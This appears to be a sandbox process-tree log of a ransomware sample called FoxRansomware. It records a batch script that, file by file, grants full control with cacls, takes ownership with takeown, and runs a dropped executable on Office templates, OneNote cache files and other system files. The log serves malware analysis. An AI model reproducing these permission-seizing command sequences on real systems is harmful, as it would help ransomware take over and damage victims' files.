level 2 | PID 6864 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
  level 3 | PID 3652 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
  level 3 | PID 5796 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" | Modifies file permissions
  level 3 | PID 5656 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
    level 4 | PID 1416 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
  level 3 | PID 1192 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5660 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
  level 3 | PID 4576 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
  level 3 | PID 6580 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
  level 3 | PID 1676 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
    level 4 | PID 6572 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
  level 3 | PID 2628 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 4348 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
  level 3 | PID 1528 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
  level 3 | PID 2392 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
  level 3 | PID 6744 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
    level 4 | PID 5100 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
  level 3 | PID 5448 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5940 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  level 3 | PID 5808 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
  level 3 | PID 4768 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" | Modifies file permissions
  level 3 | PID 1440 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    level 4 | PID 7624 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
  level 3 | PID 6940 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5356 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin""
  level 3 | PID 7608 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin" /E /G Admin:F /C
  level 3 | PID 6236 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin"
  level 3 | PID 1684 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000007.bin" -nobanner
    level 4 | PID 7808 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000007.bin" -nobanner
  level 3 | PID 5884 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 6240 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin""
  level 3 | PID 1448 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  level 3 | PID 6200 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" /E /G Admin:F /C
  level 3 | PID 7196 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin" | Modifies file permissions
  level 3 | PID 2968 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000L.bin" -nobanner
    level 4 | PID 6196 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000000L.bin" -nobanner
  level 3 | PID 5216 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 3248 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin""
  level 3 | PID 5972 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" /E /G Admin:F /C
  level 3 | PID 8096 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin" | Modifies file permissions
  level 3 | PID 564 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000V.bin" -nobanner
    level 4 | PID 6264 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000000V.bin" -nobanner
  level 3 | PID 3752 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 7304 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin""
  level 3 | PID 7204 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  level 3 | PID 4468 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin" /E /G Admin:F /C
  level 3 | PID 6076 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin"
  level 3 | PID 7300 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000006L.bin" -nobanner
    level 4 | PID 7436 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000006L.bin" -nobanner
  level 3 | PID 6316 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5984 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin""
  level 3 | PID 6244 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin" /E /G Admin:F /C
  level 3 | PID 3416 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin"
  level 3 | PID 7252 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007T.bin" -nobanner
    level 4 | PID 7520 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000007T.bin" -nobanner
  level 3 | PID 7364 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 7964 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin""
  level 3 | PID 7508 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" /E /G Admin:F /C
  level 3 | PID 2452 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin" | Modifies file permissions
  level 3 | PID 7420 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000087.bin" -nobanner
    level 4 | PID 7792 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000087.bin" -nobanner
  level 3 | PID 8044 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 60 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin""
  level 3 | PID 7908 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin" /E /G Admin:F /C
  level 3 | PID 7904 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000099.bin"
  level 3 | PID 7752 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000099.bin" -nobanner
    level 4 | PID 7920 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000099.bin" -nobanner
  level 3 | PID 8092 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 288 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin""
  level 3 | PID 7456 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin" /E /G Admin:F /C
  level 3 | PID 8012 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009J.bin"
  level 3 | PID 7936 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000009J.bin" -nobanner
    level 4 | PID 7912 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000009J.bin" -nobanner
  level 3 | PID 7896 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5152 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin""
  level 3 | PID 4828 | C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  level 3 | PID 6652 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin" /E /G Admin:F /C
  level 3 | PID 6908 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A4.bin"
  level 3 | PID 5644 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000A4.bin" -nobanner
    level 4 | PID 6984 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000A4.bin" -nobanner
  level 3 | PID 8152 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 6992 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin""
  level 3 | PID 3180 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin" /E /G Admin:F /C
  level 3 | PID 2896 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AF.bin"
  level 3 | PID 5864 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AF.bin" -nobanner
    level 4 | PID 5888 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000AF.bin" -nobanner
  level 3 | PID 3892 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 7612 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin""
  level 3 | PID 6496 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin" /E /G Admin:F /C
  level 3 | PID 7080 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AP.bin"
  level 3 | PID 6980 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AP.bin" -nobanner
    level 4 | PID 4020 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000AP.bin" -nobanner
  level 3 | PID 6832 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 7044 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin""
  level 3 | PID 8160 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" /E /G Admin:F /C
  level 3 | PID 5076 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B5.bin" | Modifies file permissions
  level 3 | PID 6628 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000B5.bin" -nobanner
    level 4 | PID 6636 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000B5.bin" -nobanner
  level 3 | PID 6840 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 6436 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  level 3 | PID 7088 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
  level 3 | PID 1332 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
  level 3 | PID 4128 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "device.png" -nobanner
    level 4 | PID 6732 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "device.png" -nobanner
  level 3 | PID 5872 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 6156 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  level 3 | PID 1596 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
  level 3 | PID 3964 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
  level 3 | PID 7836 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner
    level 4 | PID 5908 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner
  level 3 | PID 7092 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 4160 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  level 3 | PID 6424 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
  level 3 | PID 5692 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
  level 3 | PID 3836 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "tasks.xml" -nobanner
    level 4 | PID 2572 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "tasks.xml" -nobanner
  level 3 | PID 5156 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5728 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  level 3 | PID 2132 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
  level 3 | PID 3284 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
  level 3 | PID 1288 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner
    level 4 | PID 3844 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "DesktopSettings2013.xml" -nobanner
  level 3 | PID 4368 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 940 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  level 3 | PID 2088 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
  level 3 | PID 6068 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
  level 3 | PID 6016 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    level 4 | PID 4912 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
  level 3 | PID 1904 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 7260 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  level 3 | PID 4540 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
  level 3 | PID 6872 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
  level 3 | PID 5700 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    level 4 | PID 3080 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
  level 3 | PID 2440 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 4032 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""
  level 3 | PID 4836 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
  level 3 | PID 5196 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"
  level 3 | PID 2788 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "VdiState.xml" -nobanner
    level 4 | PID 4984 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "VdiState.xml" -nobanner
  level 3 | PID 5304 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 3652 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl""
  level 3 | PID 1416 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" /E /G Admin:F /C
  level 3 | PID 4376 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl"
  level 3 | PID 5904 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner
    level 4 | PID 5400 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MoUsoCoreWorker.32ca1135-9c4b-491d-a58c-7134046f09cb.2.etl" -nobanner
  level 3 | PID 5268 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
level 2 | PID 5868 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""
  level 3 | PID 3508 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C
  level 3 | PID 2808 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"
  level 3 | PID 6568 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "behavior.xml" -nobanner
    level 4 | PID 5660 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "behavior.xml" -nobanner
  level 3 | PID 5980 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
